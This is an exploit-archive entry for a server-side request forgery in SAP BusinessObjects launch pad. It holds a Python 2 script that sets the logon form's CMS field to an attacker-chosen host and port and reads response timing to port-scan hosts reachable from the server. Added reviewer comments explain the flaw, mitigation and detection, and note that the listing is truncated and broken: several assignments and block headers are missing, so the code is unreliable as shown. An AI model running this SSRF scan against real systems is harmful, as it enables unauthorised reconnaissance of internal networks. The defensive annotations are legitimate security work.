SAP BusinessObjects launch pad - Server-Side Request Forgery

ID EXPLOITPACK:8F2B147C103011E3E4A03368AB06C7F3
Type exploitpack
Reporter Ahmad Mahfouz
Modified 2017-12-27T00:00:00


SAP BusinessObjects launch pad - Server-Side Request Forgery

# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage:
# Description: Design error in SAP BusinessObjects launch pad leads to an SSRF attack

#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : http://path.faces targetIP targetPort
#
# Reviewer notes (defensive reading of this listing):
#  - The script POSTs the launch pad logon form with the CMS field
#    ("_id0:logon:CMS") set to a caller-chosen host:port and treats a logon
#    round-trip of >= 10 s as "port open": the server's own outbound
#    connection attempt is the timing oracle, i.e. the SSRF sink is the
#    client-supplied CMS address.
#  - Mitigation: the logon handler should not honour an arbitrary CMS
#    host/port from the request; restrict it to the configured CMS
#    server(s) and keep the server-side connect timeout short.
#  - Detection: logon requests whose CMS field differs from the deployed
#    CMS, and logon requests with unusually long service time from one
#    session cookie.
#  - As extracted, this listing is incomplete: several assignments have no
#    right-hand side, the formdata dict literal is not closed, and several
#    indented blocks have lost their headers. It is not runnable as shown
#    and the code is left byte-for-byte unchanged here.
import urllib2
import urllib
import ssl
from datetime import datetime
import sys


# NOTE(review): the usage check only prints; no exit is visible in this
# listing, so the argv indexing below would raise IndexError on short input.
if len(sys.argv) != 4:

   print "Usage: python http://path.faces targetIP targetPort"

url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
# host:port that the launch pad will be asked to connect to as its CMS.
targetHostIP = "%s:%s" %(targetIP,targetPort)
print "\r\n" 
print "[*] SAP BusinessObjects Timing Attack"
headers = {'User-Agent': 'Mozilla/5.0'}
# Pins the client to TLS 1.0 (deprecated); no verify_mode / CA bundle is set
# on this context here, so the first request does not verify the server cert.
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)


# Indented block whose header is missing from the listing: fetches the logon
# page (GET) so the session cookie and the JSF view state can be read.
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url


# Second headerless block: failure path for the request above.
   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"

# Right-hand side missing in the listing; the next line expects the response
# headers of the logon page and takes the session cookie from them.
resheaders =
cookie = resheaders.dict['set-cookie']
content = page.readlines()

# Scrapes the com.sun.faces.VIEW hidden-field value out of the logon HTML.
# sfview is only bound when a line matches; its later use is not visible
# because the formdata literal below is truncated.
for line in content:

   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"


# NOTE(review): if no line matched, sfview was never assigned and this
# reference raises NameError instead of printing the message.
if not sfview:

   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"

# The SSRF sink: the CMS field of the logon form carries the caller-chosen
# host:port. The dict literal is cut off in this listing.
formdata = {"_id0:logon:CMS":targetHostIP,


data_encode = urllib.urlencode(formdata)
# start / end: timestamps taken around the logon POST (right-hand sides
# missing); the_page: response body (missing). end-start is used as a
# timedelta below.
start =
print "[*] Testing Timing Attack %s" %start        
# Re-uses the session cookie from the first request. Note the POST is sent
# without the TLS context built above.
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
end =
the_page =

# "FWM" / "FWC": substrings of the response body used as outcome markers;
# presumably SAP BO error-code prefixes -- confirm against the product docs.
if "FWM" in the_page:
   elapsedTime = end-start
   # A >= 10 s round-trip is read as the server having waited on an
   # unanswered connect (port open); a fast reply as refused (closed).
   if elapsedTime.total_seconds() >= 10:

      print "[*] Port %s is Open, Gotcha !!! " %targetPort


# else-branch header missing from the listing.
      print "[*] Port %s is Closed , we die fast"  %targetPort

elif "FWC" in the_page:

   print "[-] error login expired"